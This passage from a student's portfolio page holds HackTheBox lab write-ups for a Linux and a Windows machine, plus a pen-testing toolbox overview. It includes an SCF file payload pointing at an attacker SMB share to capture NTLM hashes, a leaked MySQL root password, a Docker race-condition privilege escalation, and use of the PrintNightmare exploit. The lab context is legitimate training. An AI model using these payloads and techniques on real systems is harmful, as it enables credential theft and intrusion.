          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
